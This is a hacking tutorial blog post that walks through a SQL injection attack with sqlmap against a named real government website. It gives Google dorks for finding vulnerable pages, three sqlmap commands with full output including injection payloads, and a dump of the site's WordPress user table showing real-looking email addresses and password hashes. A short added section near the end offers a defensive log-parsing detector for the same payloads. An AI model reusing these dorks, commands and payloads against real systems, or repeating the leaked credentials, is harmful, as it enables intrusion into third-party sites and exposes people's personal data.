Info BackTrack

Linux & Security Tutorial

SQL Injection Database Takeover Tool with Sqlmap


Target : http://www.psf.gov.pk/

Sqli : http://www.psf.gov.pk/staffdetail.php?id=10'

Dork :


site:.com Warning: mysql_result():
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:"id=" & intext:"Warning: mysql_free_result()

–Step 1

python sqlmap.py -u http://www.psf.gov.pk/staffdetail.php?id=10 --dbs


lindo@laptop:/pentest/web/scanners/sqlmap# python sqlmap.py -u http://www.psf.gov.pk/staffdetail.php?id=10 --dbs

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 13:47:23

[13:47:24] [INFO] using '/pentest/web/scanners/sqlmap/output/www.psf.gov.pk/session' as session file
[13:47:24] [INFO] resuming injection data from session file
[13:47:24] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[13:47:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=10' AND 4136=4136 AND 'TaeW'='TaeW

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=10' AND (SELECT 2607 FROM(SELECT COUNT(*),CONCAT(CHAR(58,116,106,105,58),(SELECT (CASE WHEN (2607=2607) THEN 1 ELSE 0 END)),CHAR(58,99,112,97,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'uqqS'='uqqS

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-5248' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,116,106,105,58),IFNULL(CAST(CHAR(89,67,100,70,74,83,98,109,101,86) AS CHAR),CHAR(32)),CHAR(58,99,112,97,58)), NULL# AND 'kgYE'='kgYE

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=10' AND SLEEP(5) AND 'jFyF'='jFyF
---

[13:47:30] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, PHP 5.3.5
back-end DBMS: MySQL 5.0
[13:47:30] [INFO] fetching database names
[13:47:30] [INFO] read from file '/pentest/web/scanners/sqlmap/output/www.psf.gov.pk/session': information_schema, psfdb
available databases [2]:
[*] information_schema
[*] psfdb

[13:47:30] [INFO] Fetched data logged to text files under '/pentest/web/scanners/sqlmap/output/www.psf.gov.pk'

[*] shutting down at: 13:47:30

–Step 2.


lindo@laptop:/pentest/web/scanners/sqlmap# python sqlmap.py -u http://www.psf.gov.pk/staffdetail.php?id=10 -D psfdb --tables

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:59:54

[16:59:54] [INFO] using '/pentest/web/scanners/sqlmap/output/www.psf.gov.pk/session' as session file
[16:59:54] [INFO] resuming injection data from session file
[16:59:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:59:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=10' AND 4136=4136 AND 'TaeW'='TaeW

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=10' AND (SELECT 2607 FROM(SELECT COUNT(*),CONCAT(CHAR(58,116,106,105,58),(SELECT (CASE WHEN (2607=2607) THEN 1 ELSE 0 END)),CHAR(58,99,112,97,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'uqqS'='uqqS

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-5248' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,116,106,105,58),IFNULL(CAST(CHAR(89,67,100,70,74,83,98,109,101,86) AS CHAR),CHAR(32)),CHAR(58,99,112,97,58)), NULL# AND 'kgYE'='kgYE

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=10' AND SLEEP(5) AND 'jFyF'='jFyF
---

[17:00:00] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, PHP 5.3.5
back-end DBMS: MySQL 5.0
[17:00:00] [INFO] fetching tables for database 'psfdb'
[17:00:00] [INFO] read from file '/pentest/web/scanners/sqlmap/output/www.psf.gov.pk/session': psfdb, count, psfdb, descipline, psfdb, feedback, psfdb, jobs, psfdb, mantis_bug_file_table, psfdb, mantis_bug_history_table, psfdb, mantis_bug_monitor_table, psfdb, mantis_bug_relationship_table, psfdb, mantis_bug_revision_table, psfdb, mantis_bug_table, psfdb, mantis_bug_tag_table, psfdb, mantis_bug_text_table, psfdb, mantis_bugnote_table, psfdb, mantis_bugnote_text_table, psfdb, mantis_category_table, psfdb, mantis_config_table, psfdb, mantis_custom_field_project_table, psfdb, mantis_custom_field_string_table, psfdb, mantis_custom_field_table, psfdb, mantis_email_table, psfdb, mantis_filters_table, psfdb, mantis_news_table, psfdb, mantis_plugin_table, psfdb, mantis_project_file_table, psfdb, mantis_project_hierarchy_table, psfdb, mantis_project_table, psfdb, mantis_project_user_list_table, psfdb, mantis_project_version_table, psfdb, mantis_sponsorship_table, psfdb, mantis_tag_table, psfdb, mantis_tokens_table, psfdb, mantis_user_pref_table, psfdb, mantis_user_print_pref_table, psfdb, mantis_user_profile_table, psfdb, mantis_user_table, psfdb, newsletter, psfdb, organization, psfdb, pc1, psfdb, pi, psfdb, project, psfdb, staff, psfdb, staffarea, psfdb, staffawards, psfdb, staffpublication, psfdb, stafftraining, psfdb, state, psfdb, tblNews, psfdb, tenders, psfdb, test, psfdb, testpage, psfdb, travelgrant, psfdb, travelgrant_user, psfdb, user, psfdb, users_site, psfdb, wp_commentmeta, psfdb, wp_comments, psfdb, wp_links, psfdb, wp_options, psfdb, wp_postmeta, psfdb, wp_posts, psfdb, wp_term_relationships, psfdb, wp_term_taxonomy, psfdb, wp_terms, psfdb, wp_usermeta, psfdb, wp_users
Database: psfdb
[65 tables]
+-----------------------------------+
| count                             |
| descipline                        |
| feedback                          |
| jobs                              |
| mantis_bug_file_table             |
| mantis_bug_history_table          |
| mantis_bug_monitor_table          |
| mantis_bug_relationship_table     |
| mantis_bug_revision_table         |
| mantis_bug_table                  |
| mantis_bug_tag_table              |
| mantis_bug_text_table             |
| mantis_bugnote_table              |
| mantis_bugnote_text_table         |
| mantis_category_table             |
| mantis_config_table               |
| mantis_custom_field_project_table |
| mantis_custom_field_string_table  |
| mantis_custom_field_table         |
| mantis_email_table                |
| mantis_filters_table              |
| mantis_news_table                 |
| mantis_plugin_table               |
| mantis_project_file_table         |
| mantis_project_hierarchy_table    |
| mantis_project_table              |
| mantis_project_user_list_table    |
| mantis_project_version_table      |
| mantis_sponsorship_table          |
| mantis_tag_table                  |
| mantis_tokens_table               |
| mantis_user_pref_table            |
| mantis_user_print_pref_table      |
| mantis_user_profile_table         |
| mantis_user_table                 |
| newsletter                        |
| organization                      |
| pc1                               |
| pi                                |
| project                           |
| staff                             |
| staffarea                         |
| staffawards                       |
| staffpublication                  |
| stafftraining                     |
| state                             |
| tblNews                           |
| tenders                           |
| test                              |
| testpage                          |
| travelgrant                       |
| travelgrant_user                  |
| user                              |
| users_site                        |
| wp_commentmeta                    |
| wp_comments                       |
| wp_links                          |
| wp_options                        |
| wp_postmeta                       |
| wp_posts                          |
| wp_term_relationships             |
| wp_term_taxonomy                  |
| wp_terms                          |
| wp_usermeta                       |
| wp_users                          |
+-----------------------------------+

[17:00:00] [INFO] Fetched data logged to text files under '/pentest/web/scanners/sqlmap/output/www.psf.gov.pk'

[*] shutting down at: 17:00:00

–Step 3


lindo@laptop:/pentest/web/scanners/sqlmap# python sqlmap.py -u http://www.psf.gov.pk/staffdetail.php?id=10 -D psfdb -T wp_users --dump

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 17:01:49

[17:01:49] [INFO] using '/pentest/web/scanners/sqlmap/output/www.psf.gov.pk/session' as session file
[17:01:49] [INFO] resuming injection data from session file
[17:01:49] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:01:51] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=10' AND 4136=4136 AND 'TaeW'='TaeW

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=10' AND (SELECT 2607 FROM(SELECT COUNT(*),CONCAT(CHAR(58,116,106,105,58),(SELECT (CASE WHEN (2607=2607) THEN 1 ELSE 0 END)),CHAR(58,99,112,97,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'uqqS'='uqqS

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-5248' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,116,106,105,58),IFNULL(CAST(CHAR(89,67,100,70,74,83,98,109,101,86) AS CHAR),CHAR(32)),CHAR(58,99,112,97,58)), NULL# AND 'kgYE'='kgYE

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=10' AND SLEEP(5) AND 'jFyF'='jFyF
---

[17:01:54] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, PHP 5.3.5
back-end DBMS: MySQL 5.0
[17:01:54] [INFO] fetching columns for table 'wp_users' on database 'psfdb'
[17:01:54] [INFO] read from file '/pentest/web/scanners/sqlmap/output/www.psf.gov.pk/session': ID, bigint(20) unsigned, user_login, varchar(60), user_pass, varchar(64), user_nicename, varchar(50), user_email, varchar(100), user_url, varchar(100), user_registered, datetime, user_activation_key, varchar(60), user_status, int(11), display_name, varchar(250)
[17:01:54] [INFO] fetching entries for table 'wp_users' on database 'psfdb'
[17:01:54] [INFO] read from file '/pentest/web/scanners/sqlmap/output/www.psf.gov.pk/session': 2
[17:01:54] [INFO] the SQL query used returns 2 entries
Database: psfdb
Table: wp_users
[2 entries]
+--------------+----+---------------------+-------------------------+------------+---------------+------------------------------------+---------------------+-------------+----------+
| display_name | ID | user_activation_key | user_email              | user_login | user_nicename | user_pass                          | user_registered     | user_status | user_url |
+--------------+----+---------------------+-------------------------+------------+---------------+------------------------------------+---------------------+-------------+----------+
| usman        | 2  | NULL                | rockstone435@gmail.lcom | usman      | usman         | $P$Bq8UpfIraLpFskvJUf7zPsX30dMzOS. | 2012-09-10 09:06:59 | 0           | NULL     |
| admin        | 1  | NULL                | usmiusman@gmail.com     | admin      | admin         | $P$B5D2gwaEv6vhlACcaKQSniu17ROcMd0 | 2012-09-10 08:56:37 | 0           | NULL     |
+--------------+----+---------------------+-------------------------+------------+---------------+------------------------------------+---------------------+-------------+----------+

[17:02:00] [INFO] Table 'psfdb.wp_users' dumped to CSV file '/pentest/web/scanners/sqlmap/output/www.psf.gov.pk/dump/psfdb/wp_users.csv'
[17:02:00] [INFO] Fetched data logged to text files under '/pentest/web/scanners/sqlmap/output/www.psf.gov.pk'

[*] shutting down at: 17:02:00

user_login = usman
user_pass = $P$Bq8UpfIraLpFskvJUf7zPsX30dMzOS.

user_login = admin
user_pass = $P$B5D2gwaEv6vhlACcaKQSniu17ROcMd0

–done
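The three sqlmap runs above leave a recognisable trail in the web server's access log: a quote appended to a numeric id, `AND n=n` tautologies, `UNION ALL SELECT NULL` probes, `SLEEP()` calls and, unless the operator changes it, the `sqlmap/0.9` User-Agent. The following detector is an added example, not part of the original post; it parses constructed Nginx combined-format log lines (the target site above runs Nginx) and labels each suspicious request with the technique its payload matches. The log lines, IP addresses and timestamps are made up for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Nginx access-log sample (not from the original post): three
# URL-encoded probes shaped like the sqlmap payloads above, plus two normal hits.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Sep/2012:13:47:24 +0000] "GET /staffdetail.php?id=10 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Sep/2012:13:47:25 +0000] "GET /staffdetail.php?id=10%27%20AND%204136%3D4136%20AND%20%27TaeW%27%3D%27TaeW HTTP/1.1" 200 5120 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
203.0.113.5 - - [10/Sep/2012:13:47:26 +0000] "GET /staffdetail.php?id=-5248%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL%23 HTTP/1.1" 200 7000 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
203.0.113.5 - - [10/Sep/2012:13:47:31 +0000] "GET /staffdetail.php?id=10%27%20AND%20SLEEP(5)%20AND%20%27jFyF%27%3D%27jFyF HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Sep/2012:13:50:00 +0000] "GET /staffdetail.php?id=12 HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
"""

# Nginx "combined" format: ip ident user [time] "METHOD target PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
                    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

# One signature per injection technique reported by sqlmap; applied to the decoded parameter value.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),   # AND 4136=4136
    "error-based":         re.compile(r"FLOOR\s*\(\s*RAND\s*\(|information_schema", re.I),
    "UNION query":         re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "time-based blind":    re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
}
NUMERIC_ID_BREAKOUT = re.compile(r"^-?\d+'")  # a quote right after a numeric id value


def classify_value(value):
    """Return the technique labels whose signature matches one (already URL-decoded) parameter value."""
    hits = [name for name, rx in SIGNATURES.items() if rx.search(value)]
    if NUMERIC_ID_BREAKOUT.match(value):
        hits.append("quote after numeric id")
    return hits


def scan_log(text):
    """Parse access-log lines; return (ip, param, techniques, ua) for each suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash on malformed input
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):  # parse_qsl percent-decodes
            techniques = classify_value(value)
            if techniques or "sqlmap" in m.group("ua").lower():
                findings.append((m.group("ip"), name, techniques, m.group("ua")))
    return findings
```

Signature matching on decoded parameters catches the default payloads; a parameterised query in `staffdetail.php` is still the fix, since tamper scripts can reshape what the log sees.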

Thank you for reading this simple article of mine. If you have any questions, please leave a comment or PM me. =))

greetz: Mama, Papa, and my late fiancée (I don't care about other women).

Created by Lindo.
